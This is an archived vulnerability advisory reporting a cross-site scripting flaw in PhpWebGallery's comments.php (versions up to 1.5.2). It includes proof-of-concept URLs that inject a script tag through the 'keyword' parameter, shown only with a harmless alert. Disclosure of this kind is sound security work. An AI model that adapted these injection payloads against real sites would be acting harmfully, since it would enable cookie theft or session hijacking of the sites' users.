TUCoPS :: Web :: PHP :: b06-3442.htm

PhpWebGallery Cross Site Scripting Vulnerability
PhpWebGallery Cross Site Scripting Vulnerability
PhpWebGallery Cross Site Scripting Vulnerability


Produce : PhpWebGallery <= 1.5.2=0D
Site : http://www.phpwebgallery.net=0D 
Problem : XSS=0D
Greetz  : hasnaa and all friends=0D
=0D
Moroccan Security Research Team=0D
=0D
Vulnerable file : comments.php=0D
=0D
Exploit :=0D
=0D
http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]=0D 
=0D
http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E=0D 
=0D
Contact : iss4m.h@gmail.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH